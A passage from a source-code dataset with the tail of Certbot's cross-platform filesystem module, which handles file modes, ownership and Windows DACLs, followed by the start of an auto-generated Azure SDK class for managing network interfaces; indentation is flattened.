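# Short illustration (hypothetical path): chmod('certs/privkey.pem', 0o600) gives the owner
# read/write on Linux; on Windows the same call builds a DACL granting the owner read/write,
# full control to SYSTEM and Administrators, and nothing to Everyone.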
def umask(mask):
# type: (int) -> int
"""
Set the current numeric umask and return the previous umask. On Linux, the built-in umask
method is used. On Windows, our Certbot-side implementation is used.
:param int mask: The user file-creation mode mask to apply.
:rtype: int
:return: The previous umask value.
"""
if POSIX_MODE:
return os.umask(mask)
previous_umask = _WINDOWS_UMASK.mask
_WINDOWS_UMASK.mask = mask
return previous_umask
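# Sketch of the intended usage pattern: tighten the mask around a sensitive write and then
# restore the previous value, so behaviour is the same on Linux and Windows:
#   previous = umask(0o077)
#   try:
#       fd = open('secret.txt', os.O_CREAT | os.O_WRONLY, 0o600)
#   finally:
#       umask(previous)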
# One could ask why there is no copy_ownership() function, or even a reimplementation
# of os.chown() that would modify the ownership of file without touching the mode itself.
# This is because on Windows, it would require recalculating the existing DACL against
# the new owner, since the DACL is composed of ACEs that targets a specific user, not dynamically
# the current owner of a file. This action would be necessary to keep consistency between
# the POSIX mode applied to the file and the current owner of this file.
# Since copying and editing arbitrary DACL is very difficult, and since we actually know
# the mode to apply at the time the owner of a file should change, it is easier to just
# change the owner, then reapply the known mode, as copy_ownership_and_apply_mode() does.
def copy_ownership_and_apply_mode(src, dst, mode, copy_user, copy_group):
# type: (str, str, int, bool, bool) -> None
"""
Copy ownership (user and optionally group on Linux) from the source to the
destination, then apply given mode in compatible way for Linux and Windows.
This replaces the os.chown command.
:param str src: Path of the source file
:param str dst: Path of the destination file
:param int mode: Permission mode to apply on the destination file
:param bool copy_user: Copy user if `True`
:param bool copy_group: Copy group if `True` on Linux (has no effect on Windows)
"""
if POSIX_MODE:
stats = os.stat(src)
user_id = stats.st_uid if copy_user else -1
group_id = stats.st_gid if copy_group else -1
# On Windows, os.chown does not exist. This is checked through POSIX_MODE value,
# but MyPy/PyLint does not know it and raises an error here on Windows.
# We disable specifically the check to fix the issue.
os.chown(dst, user_id, group_id)
elif copy_user:
# There is no group handling in Windows
_copy_win_ownership(src, dst)
chmod(dst, mode)
# Quite similar to copy_ownership_and_apply_mode, but this time the DACL is copied from
# the source file on Windows. The DACL stays consistent with the dynamic rights of the
# equivalent POSIX mode, because ownership and mode are copied altogether on the destination
# file, so no recomputing of the DACL against the new owner is needed, as it would be
# for a copy_ownership alone method.
def copy_ownership_and_mode(src, dst, copy_user=True, copy_group=True):
# type: (str, str, bool, bool) -> None
"""
Copy ownership (user and optionally group on Linux) and mode/DACL
from the source to the destination.
:param str src: Path of the source file
:param str dst: Path of the destination file
:param bool copy_user: Copy user if `True`
:param bool copy_group: Copy group if `True` on Linux (has no effect on Windows)
"""
if POSIX_MODE:
# On Linux, we just delegate to chown and chmod.
stats = os.stat(src)
user_id = stats.st_uid if copy_user else -1
group_id = stats.st_gid if copy_group else -1
os.chown(dst, user_id, group_id)
chmod(dst, stats.st_mode)
else:
if copy_user:
# There is no group handling in Windows
_copy_win_ownership(src, dst)
_copy_win_mode(src, dst)
def check_mode(file_path, mode):
# type: (str, int) -> bool
"""
Check if the given mode matches the permissions of the given file.
On Linux, will make a direct comparison, on Windows, mode will be compared against
the security model.
:param str file_path: Path of the file
:param int mode: POSIX mode to test
:rtype: bool
:return: True if the POSIX mode matches the file permissions
"""
if POSIX_MODE:
return stat.S_IMODE(os.stat(file_path).st_mode) == mode
return _check_win_mode(file_path, mode)
def check_owner(file_path):
# type: (str) -> bool
"""
Check if given file is owned by current user.
:param str file_path: File path to check
:rtype: bool
:return: True if given file is owned by current user, False otherwise.
"""
if POSIX_MODE:
# On Windows, os.getuid does not exist. This is checked through POSIX_MODE value,
# but MyPy/PyLint does not know it and raises an error here on Windows.
# We disable specifically the check to fix the issue.
return os.stat(file_path).st_uid == os.getuid() # type: ignore
# Get owner sid of the file
security = win32security.GetFileSecurity(file_path, win32security.OWNER_SECURITY_INFORMATION)
user = security.GetSecurityDescriptorOwner()
# Compare sids
return _get_current_user() == user
def check_permissions(file_path, mode):
# type: (str, int) -> bool
"""
Check if given file has the given mode and is owned by current user.
:param str file_path: File path to check
:param int mode: POSIX mode to check
:rtype: bool
:return: True if file has correct mode and owner, False otherwise.
"""
return check_owner(file_path) and check_mode(file_path, mode)
def open(file_path, flags, mode=0o777): # pylint: disable=redefined-builtin
# type: (str, int, int) -> int
"""
Wrapper of original os.open function, that will ensure on Windows that given mode
is correctly applied.
:param str file_path: The file path to open
:param int flags: Flags to apply on file while opened
:param int mode: POSIX mode to apply on file when opened,
Python defaults will be applied if ``None``
:returns: the file descriptor to the opened file
:rtype: int
:raise: OSError(errno.EEXIST) if the file already exists and os.O_CREAT & os.O_EXCL are set,
OSError(errno.EACCES) on Windows if the file already exists and is a directory, and
os.O_CREAT is set.
"""
if POSIX_MODE:
# On Linux, invoke os.open directly.
return os.open(file_path, flags, mode)
# Windows: handle creation of the file atomically with proper permissions.
if flags & os.O_CREAT:
# If os.O_EXCL is set, we will use the "CREATE_NEW", that will raise an exception if
# file exists, matching the API contract of this bit flag. Otherwise, we use
# "CREATE_ALWAYS" that will always create the file whether it exists or not.
disposition = win32con.CREATE_NEW if flags & os.O_EXCL else win32con.CREATE_ALWAYS
attributes = win32security.SECURITY_ATTRIBUTES()
security = attributes.SECURITY_DESCRIPTOR
user = _get_current_user()
dacl = _generate_dacl(user, mode, _WINDOWS_UMASK.mask)
# We set second parameter to 0 (`False`) to say that this security descriptor is
# NOT constructed from a default mechanism, but is explicitly set by the user.
# See https://docs.microsoft.com/en-us/windows/desktop/api/securitybaseapi/nf-securitybaseapi-setsecuritydescriptorowner # pylint: disable=line-too-long
security.SetSecurityDescriptorOwner(user, 0)
# We set first parameter to 1 (`True`) to say that this security descriptor contains
# a DACL. Otherwise second and third parameters are ignored.
# We set third parameter to 0 (`False`) to say that this security descriptor is
# NOT constructed from a default mechanism, but is explicitly set by the user.
# See https://docs.microsoft.com/en-us/windows/desktop/api/securitybaseapi/nf-securitybaseapi-setsecuritydescriptordacl # pylint: disable=line-too-long
security.SetSecurityDescriptorDacl(1, dacl, 0)
handle = None
try:
handle = win32file.CreateFile(file_path, win32file.GENERIC_READ,
win32file.FILE_SHARE_READ & win32file.FILE_SHARE_WRITE,
attributes, disposition, 0, None)
except pywintypes.error as err:
# Handle native windows errors into python errors to be consistent with the API
# of os.open in the situation of a file already existing or locked.
if err.winerror == winerror.ERROR_FILE_EXISTS:
raise OSError(errno.EEXIST, err.strerror)
if err.winerror == winerror.ERROR_SHARING_VIOLATION:
raise OSError(errno.EACCES, err.strerror)
raise err
finally:
if handle:
handle.Close()
# At this point, the file that did not exist has been created with proper permissions,
# so os.O_CREAT and os.O_EXCL are not needed anymore. We remove them from the flags to
# avoid a FileExists exception before calling os.open.
return os.open(file_path, flags ^ os.O_CREAT ^ os.O_EXCL)
# Windows: general case, we call os.open, let exceptions be thrown, then chmod if all is fine.
handle = os.open(file_path, flags)
chmod(file_path, mode)
return handle
def makedirs(file_path, mode=0o777):
# type: (str, int) -> None
"""
Rewrite of original os.makedirs function, that will ensure on Windows that given mode
is correctly applied.
:param str file_path: The file path to open
:param int mode: POSIX mode to apply on leaf directory when created, Python defaults
will be applied if ``None``
"""
current_umask = umask(0)
try:
# Since Python 3.7, os.makedirs does not set the given mode to the intermediate
# directories that could be created in the process. To keep things safe and consistent
# on all Python versions, we set the umask accordingly to have all directories
# (intermediate and leaf) created with the given mode.
umask(current_umask | 0o777 ^ mode)
if POSIX_MODE:
return os.makedirs(file_path, mode)
orig_mkdir_fn = os.mkdir
try:
# As we know that os.mkdir is called internally by os.makedirs, we will swap the
# function in os module for the time of makedirs execution on Windows.
os.mkdir = mkdir # type: ignore
return os.makedirs(file_path, mode)
finally:
os.mkdir = orig_mkdir_fn
finally:
umask(current_umask)
def mkdir(file_path, mode=0o777):
# type: (str, int) -> None
"""
Rewrite of original os.mkdir function, that will ensure on Windows that given mode
is correctly applied.
:param str file_path: The file path to open
:param int mode: POSIX mode to apply on directory when created, Python defaults
will be applied if ``None``
"""
if POSIX_MODE:
return os.mkdir(file_path, mode)
attributes = win32security.SECURITY_ATTRIBUTES()
security = attributes.SECURITY_DESCRIPTOR
user = _get_current_user()
dacl = _generate_dacl(user, mode, _WINDOWS_UMASK.mask)
security.SetSecurityDescriptorOwner(user, False)
security.SetSecurityDescriptorDacl(1, dacl, 0)
try:
win32file.CreateDirectory(file_path, attributes)
except pywintypes.error as err:
# Handle native windows error into python error to be consistent with the API
# of os.mkdir in the situation of a directory already existing.
if err.winerror == winerror.ERROR_ALREADY_EXISTS:
raise OSError(errno.EEXIST, err.strerror, file_path, err.winerror)
raise err
return None
def replace(src, dst):
# type: (str, str) -> None
"""
Rename a file to a destination path and handles situations where the destination exists.
:param str src: The current file path.
:param str dst: The new file path.
"""
if hasattr(os, 'replace'):
# Use replace if possible. Since we don't support Python 2 on Windows
# and os.replace() was added in Python 3.3, we can assume that
# os.replace() is always available on Windows.
getattr(os, 'replace')(src, dst)
else:
# Otherwise, use os.rename() that behaves like os.replace() on Linux.
os.rename(src, dst)
def realpath(file_path):
# type: (str) -> str
"""
Find the real path for the given path. This method resolves symlinks, including
recursive symlinks, and is protected against symlinks that creates an infinite loop.
:param str file_path: The path to resolve
:returns: The real path for the given path
:rtype: str
"""
original_path = file_path
# Since Python 3.8, os.path.realpath also resolves symlinks on Windows.
if POSIX_MODE or sys.version_info >= (3, 8):
path = os.path.realpath(file_path)
if os.path.islink(path):
# If path returned by realpath is still a link, it means that it failed to
# resolve the symlink because of a loop.
# See realpath code: https://github.com/python/cpython/blob/master/Lib/posixpath.py
raise RuntimeError('Error, link {0} is a loop!'.format(original_path))
return path
inspected_paths = [] # type: List[str]
while os.path.islink(file_path):
link_path = file_path
file_path = os.readlink(file_path)
if not os.path.isabs(file_path):
file_path = os.path.join(os.path.dirname(link_path), file_path)
if file_path in inspected_paths:
raise RuntimeError('Error, link {0} is a loop!'.format(original_path))
inspected_paths.append(file_path)
return os.path.abspath(file_path)
def readlink(link_path):
# type: (str) -> str
"""
Return a string representing the path to which the symbolic link points.
:param str link_path: The symlink path to resolve
:return: The path the symlink points to
:returns: str
:raise: ValueError if a long path (260> characters) is encountered on Windows
"""
path = os.readlink(link_path)
if POSIX_MODE or not path.startswith('\\\\?\\'):
return path
# At that point, we are on Windows and the path returned uses the long form (Python 3.8+).
# Max length of a normal path is 260 characters on Windows, including the non printable
# termination character "<NUL>". The termination character is not included in Python
# strings, giving a max length of 259 characters, + 4 characters for the extended form
# prefix, to an effective max length 263 characters on a string representing a normal path.
if len(path) < 264:
return path[4:]
raise ValueError("Long paths are not supported by Certbot on Windows.")
# On Windows is_executable run from an unprivileged shell may claim that a path is
# executable when it is executable only if run from a privileged shell. This result
# is due to the fact that GetEffectiveRightsFromAcl calculate effective rights
# without taking into consideration if the target user has currently required the
# elevated privileges or not. However this is not a problem since certbot always
# requires to be run under a privileged shell, so the user will always benefit
# from the highest (privileged one) set of permissions on a given file.
def is_executable(path):
# type: (str) -> bool
"""
Is path an executable file?
:param str path: path to test
:return: True if path is an executable file
:rtype: bool
"""
if POSIX_MODE:
return os.path.isfile(path) and os.access(path, os.X_OK)
return _win_is_executable(path)
def has_world_permissions(path):
# type: (str) -> bool
"""
Check if everybody/world has any right (read/write/execute) on a file given its path.
:param str path: path to test
:return: True if everybody/world has any right to the file
:rtype: bool
"""
if POSIX_MODE:
return bool(stat.S_IMODE(os.stat(path).st_mode) & stat.S_IRWXO)
security = win32security.GetFileSecurity(path, win32security.DACL_SECURITY_INFORMATION)
dacl = security.GetSecurityDescriptorDacl()
return bool(dacl.GetEffectiveRightsFromAcl({
'TrusteeForm': win32security.TRUSTEE_IS_SID,
'TrusteeType': win32security.TRUSTEE_IS_USER,
'Identifier': win32security.ConvertStringSidToSid('S-1-1-0'),
}))
def compute_private_key_mode(old_key, base_mode):
# type: (str, int) -> int
"""
Calculate the POSIX mode to apply to a private key given the previous private key.
:param str old_key: path to the previous private key
:param int base_mode: the minimum modes to apply to a private key
:return: the POSIX mode to apply
:rtype: int
"""
if POSIX_MODE:
# On Linux, we keep read/write/execute permissions
# for group and read permissions for everybody.
old_mode = (stat.S_IMODE(os.stat(old_key).st_mode) &
(stat.S_IRGRP | stat.S_IWGRP | stat.S_IXGRP | stat.S_IROTH))
return base_mode | old_mode
# On Windows, the mode returned by os.stat is not reliable,
# so we do not keep any permission from the previous private key.
return base_mode
def has_same_ownership(path1, path2):
# type: (str, str) -> bool
"""
Return True if the ownership of two files given their respective path is the same.
On Windows, ownership is checked against owner only, since files do not have a group owner.
:param str path1: path to the first file
:param str path2: path to the second file
:return: True if both files have the same ownership, False otherwise
:rtype: bool
"""
if POSIX_MODE:
stats1 = os.stat(path1)
stats2 = os.stat(path2)
return (stats1.st_uid, stats1.st_gid) == (stats2.st_uid, stats2.st_gid)
security1 = win32security.GetFileSecurity(path1, win32security.OWNER_SECURITY_INFORMATION)
user1 = security1.GetSecurityDescriptorOwner()
security2 = win32security.GetFileSecurity(path2, win32security.OWNER_SECURITY_INFORMATION)
user2 = security2.GetSecurityDescriptorOwner()
return user1 == user2
def has_min_permissions(path, min_mode):
# type: (str, int) -> bool
"""
Check if a file given its path has at least the permissions defined by the given minimal mode.
On Windows, group permissions are ignored since files do not have a group owner.
:param str path: path to the file to check
:param int min_mode: the minimal permissions expected
:return: True if the file matches the minimal permissions expectations, False otherwise
:rtype: bool
"""
if POSIX_MODE:
st_mode = os.stat(path).st_mode
return st_mode == st_mode | min_mode
# Resolve symlinks, to get a consistent result with os.stat on Linux,
# that follows symlinks by default.
path = realpath(path)
# Get owner sid of the file
security = win32security.GetFileSecurity(
path, win32security.OWNER_SECURITY_INFORMATION | win32security.DACL_SECURITY_INFORMATION)
user = security.GetSecurityDescriptorOwner()
dacl = security.GetSecurityDescriptorDacl()
min_dacl = _generate_dacl(user, min_mode)
for index in range(min_dacl.GetAceCount()):
min_ace = min_dacl.GetAce(index)
# On a given ACE, index 0 is the ACE type, 1 is the permission mask, and 2 is the SID.
# See: http://timgolden.me.uk/pywin32-docs/PyACL__GetAce_meth.html
mask = min_ace[1]
user = min_ace[2]
effective_mask = dacl.GetEffectiveRightsFromAcl({
'TrusteeForm': win32security.TRUSTEE_IS_SID,
'TrusteeType': win32security.TRUSTEE_IS_USER,
'Identifier': user,
})
if effective_mask != effective_mask | mask:
return False
return True
def _win_is_executable(path):
if not os.path.isfile(path):
return False
security = win32security.GetFileSecurity(path, win32security.DACL_SECURITY_INFORMATION)
dacl = security.GetSecurityDescriptorDacl()
mode = dacl.GetEffectiveRightsFromAcl({
'TrusteeForm': win32security.TRUSTEE_IS_SID,
'TrusteeType': win32security.TRUSTEE_IS_USER,
'Identifier': _get_current_user(),
})
return mode & ntsecuritycon.FILE_GENERIC_EXECUTE == ntsecuritycon.FILE_GENERIC_EXECUTE
def _apply_win_mode(file_path, mode):
"""
This function converts the given POSIX mode into a Windows ACL list, and applies it to the
file given its path. If the given path is a symbolic link, it will resolved to apply the
mode on the targeted file.
"""
file_path = realpath(file_path)
# Get owner sid of the file
security = win32security.GetFileSecurity(file_path, win32security.OWNER_SECURITY_INFORMATION)
user = security.GetSecurityDescriptorOwner()
# New DACL, that will overwrite existing one (including inherited permissions)
dacl = _generate_dacl(user, mode)
# Apply the new DACL
security.SetSecurityDescriptorDacl(1, dacl, 0)
win32security.SetFileSecurity(file_path, win32security.DACL_SECURITY_INFORMATION, security)
def _generate_dacl(user_sid, mode, mask=None):
if mask:
mode = mode & (0o777 - mask)
analysis = _analyze_mode(mode)
# Get standard accounts from "well-known" sid
# See the list here:
# https://support.microsoft.com/en-us/help/243330/well-known-security-identifiers-in-windows-operating-systems
system = win32security.ConvertStringSidToSid('S-1-5-18')
admins = win32security.ConvertStringSidToSid('S-1-5-32-544')
everyone = win32security.ConvertStringSidToSid('S-1-1-0')
# New dacl, without inherited permissions
dacl = win32security.ACL()
# If user is already system or admins, any ACE defined here would be superseded by
# the full control ACE that will be added after.
if user_sid not in [system, admins]:
# Handle user rights
user_flags = _generate_windows_flags(analysis['user'])
if user_flags:
dacl.AddAccessAllowedAce(win32security.ACL_REVISION, user_flags, user_sid)
# Handle everybody rights
everybody_flags = _generate_windows_flags(analysis['all'])
if everybody_flags:
dacl.AddAccessAllowedAce(win32security.ACL_REVISION, everybody_flags, everyone)
# Handle administrator rights
full_permissions = _generate_windows_flags({'read': True, 'write': True, 'execute': True})
dacl.AddAccessAllowedAce(win32security.ACL_REVISION, full_permissions, system)
dacl.AddAccessAllowedAce(win32security.ACL_REVISION, full_permissions, admins)
return dacl
def _analyze_mode(mode):
return {
'user': {
'read': mode & stat.S_IRUSR,
'write': mode & stat.S_IWUSR,
'execute': mode & stat.S_IXUSR,
},
'all': {
'read': mode & stat.S_IROTH,
'write': mode & stat.S_IWOTH,
'execute': mode & stat.S_IXOTH,
},
}
def _copy_win_ownership(src, dst):
# Resolve symbolic links
src = realpath(src)
security_src = win32security.GetFileSecurity(src, win32security.OWNER_SECURITY_INFORMATION)
user_src = security_src.GetSecurityDescriptorOwner()
security_dst = win32security.GetFileSecurity(dst, win32security.OWNER_SECURITY_INFORMATION)
# Second parameter indicates, if `False`, that the owner of the file is not provided by some
# default mechanism, but is explicitly set instead. This is obviously what we are doing here.
security_dst.SetSecurityDescriptorOwner(user_src, False)
win32security.SetFileSecurity(dst, win32security.OWNER_SECURITY_INFORMATION, security_dst)
def _copy_win_mode(src, dst):
# Resolve symbolic links
src = realpath(src)
# Copy the DACL from src to dst.
security_src = win32security.GetFileSecurity(src, win32security.DACL_SECURITY_INFORMATION)
dacl = security_src.GetSecurityDescriptorDacl()
security_dst = win32security.GetFileSecurity(dst, win32security.DACL_SECURITY_INFORMATION)
security_dst.SetSecurityDescriptorDacl(1, dacl, 0)
win32security.SetFileSecurity(dst, win32security.DACL_SECURITY_INFORMATION, security_dst)
def _generate_windows_flags(rights_desc):
# Some notes about how each POSIX right is interpreted.
#
# For the rights read and execute, we have a pretty bijective relation between
# POSIX flags and their generic counterparts on Windows, so we use them directly
# (respectively ntsecuritycon.FILE_GENERIC_READ and ntsecuritycon.FILE_GENERIC_EXECUTE).
#
# But ntsecuritycon.FILE_GENERIC_WRITE does not correspond to what one could expect from a
# write access on Linux: for Windows, FILE_GENERIC_WRITE does not include delete, move or
# rename. This is something that requires ntsecuritycon.FILE_ALL_ACCESS.
# So to reproduce the write right as POSIX, we will apply ntsecuritycon.FILE_ALL_ACCESS
# subtracted of the rights corresponding to POSIX read and POSIX execute.
#
# Finally, having read + write + execute gives a ntsecuritycon.FILE_ALL_ACCESS,
# so a "Full Control" on the file.
#
# A complete list of the rights defined on NTFS can be found here:
# https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc783530(v=ws.10)#permissions-for-files-and-folders
flag = 0
if rights_desc['read']:
flag = flag | ntsecuritycon.FILE_GENERIC_READ
if rights_desc['write']:
flag = flag | (ntsecuritycon.FILE_ALL_ACCESS
^ ntsecuritycon.FILE_GENERIC_READ
^ ntsecuritycon.FILE_GENERIC_EXECUTE)
if rights_desc['execute']:
flag = flag | ntsecuritycon.FILE_GENERIC_EXECUTE
return flag
def _check_win_mode(file_path, mode):
# Resolve symbolic links
file_path = realpath(file_path)
# Get current dacl file
security = win32security.GetFileSecurity(file_path, win32security.OWNER_SECURITY_INFORMATION
| win32security.DACL_SECURITY_INFORMATION)
dacl = security.GetSecurityDescriptorDacl()
# Get current file owner sid
user = security.GetSecurityDescriptorOwner()
if not dacl:
# No DACL means full control to everyone
# This is not a deterministic permissions set.
return False
# Calculate the target dacl
ref_dacl = _generate_dacl(user, mode)
return _compare_dacls(dacl, ref_dacl)
def _compare_dacls(dacl1, dacl2):
"""
This method compare the two given DACLs to check if they are identical.
Identical means here that they contains the same set of ACEs in the same order.
"""
return ([dacl1.GetAce(index) for index in range(dacl1.GetAceCount())] ==
[dacl2.GetAce(index) for index in range(dacl2.GetAceCount())])
def _get_current_user():
"""
Return the pySID corresponding to the current user.
"""
# We craft the account_name ourselves instead of calling for instance win32api.GetUserNameEx,
# because this function returns nonsense values when Certbot is run under NT AUTHORITY\SYSTEM.
# To run Certbot under NT AUTHORITY\SYSTEM, you can open a shell using the instructions here:
# https://blogs.technet.microsoft.com/ben_parker/2010/10/27/how-do-i-run-powershell-execommand-prompt-as-the-localsystem-account-on-windows-7/
account_name = r"{0}\{1}".format(win32api.GetDomainName(), win32api.GetUserName())
# LookupAccountName() expects the system name as first parameter. By passing None to it,
# we instruct Windows to first search the matching account in the machine local accounts,
# then into the primary domain accounts, if the machine has joined a domain, then finally
# into the trusted domains accounts. This is the preferred lookup mechanism to use in Windows
# if there is no reason to use a specific lookup mechanism.
# See https://docs.microsoft.com/en-us/windows/desktop/api/winbase/nf-winbase-lookupaccountnamea
return win32security.LookupAccountName(None, account_name)[0]
|
py | 7df7e0c5a5abcf9bbc4b54f7587a74cbc1637e2a | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class NetworkInterfacesOperations(object):
"""NetworkInterfacesOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2018_01_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _delete_initial(
self,
resource_group_name, # type: str
network_interface_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-01-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
network_interface_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller
"""Deletes the specified network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
network_interface_name, # type: str
expand=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> "models.NetworkInterface"
"""Gets information about the specified network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkInterface, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2018_01_01.models.NetworkInterface
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterface"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-01-01"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
network_interface_name, # type: str
parameters, # type: "models.NetworkInterface"
**kwargs # type: Any
):
# type: (...) -> "models.NetworkInterface"
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterface"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-01-01"
content_type = kwargs.pop("content_type", "application/json")
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = 'application/json'
# Construct and send request
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'NetworkInterface')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
network_interface_name, # type: str
parameters, # type: "models.NetworkInterface"
**kwargs # type: Any
):
# type: (...) -> LROPoller
"""Creates or updates a network interface.
